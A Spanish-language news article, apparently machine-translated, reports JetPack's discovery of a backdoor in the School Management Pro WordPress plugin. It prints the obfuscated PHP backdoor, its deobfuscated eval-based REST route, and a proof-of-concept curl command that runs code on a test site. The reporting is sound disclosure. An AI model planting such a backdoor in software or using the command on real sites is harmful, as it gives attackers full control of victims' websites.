Los investigadores encuentran una puerta trasera al acecho en el complemento de WordPress utilizado por las escuelas

Una puerta de dibujos animados conduce a una pared de código de computadora.

Los investigadores dijeron el viernes que encontraron una puerta trasera maliciosa en un complemento de WordPress que les dio a los atacantes el control total de los sitios web que usaban el paquete, que se comercializa en las escuelas.

La versión premium de Gestión escolarun complemento que usan las escuelas para operar y administrar sus sitios web, ha contenido la puerta trasera desde al menos la versión 8.9, dijeron investigadores del servicio de seguridad de sitios web JetPack en un entrada en el blog sin descartar que hubiera estado presente en versiones anteriores. Esta página de un sitio de terceros muestra que la versión 8.9 se lanzó en agosto pasado.

puerta trasera obvia

Jetpack dijo que descubrió la puerta trasera después de que los miembros del equipo de soporte de WordPress.com informaron haber encontrado un código muy ofuscado en varios sitios que usaban School Management Pro. Después de desofuscarlo, se dieron cuenta de que el código, escondido en la parte de verificación de licencia del complemento, se colocó intencionalmente allí con el objetivo de brindar a los extraños la capacidad de tomar el control de los sitios.

“El código en sí no es tan interesante: es una puerta trasera obvia inyectada en el código de verificación de licencia del complemento”, dijo la publicación de JetPack. “Permite que cualquier atacante ejecute código PHP arbitrario en el sitio con el complemento instalado”.

En su forma ofuscada, el código se veía así:

}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

Después de la desofuscación, el código era:

add_action( "rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Los investigadores escribieron un exploit de prueba de concepto que confirmó que el código ofuscado era de hecho una puerta trasera que permitía a cualquier persona con conocimiento ejecutar el código de su elección en cualquier sitio que ejecutara el complemento.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

el misterio permanece

No está claro cuántos sitios usan el complemento. Weblizar, el fabricante de School Management con sede en India, dice en su página de inicio que tiene más de 340 000 clientes para sus temas y complementos gratuitos y premium, pero la puerta trasera que encontró JetPack solo estaba en School Management Pro. La puerta trasera no estaba en la versión gratuita del complemento, y no hay indicios de que se haya colocado en otros complementos que publica Weblizar.

“Hemos tratado de obtener más información del proveedor sobre cuándo se inyectó la puerta trasera, qué versiones se ven afectadas y cómo el código terminó en el complemento en primer lugar”, dice la publicación. “Este esfuerzo no ha tenido éxito, ya que el proveedor dice que no sabe cuándo ni cómo entró el código en su software”.

Los intentos de comunicarse con Weblizar no tuvieron éxito.

Ahora que la presencia de la puerta trasera es de conocimiento público, es probable que los atacantes la exploten en cualquier sitio web utilizando una versión vulnerable del complemento. Cualquiera que use este complemento debe actualizarlo de inmediato. Incluso después de parchear, también deben escanear cuidadosamente su sitio en busca de signos de compromiso, ya que la actualización no eliminará ninguna puerta trasera nueva que se haya agregado.

Leave a Reply

Your email address will not be published. Required fields are marked *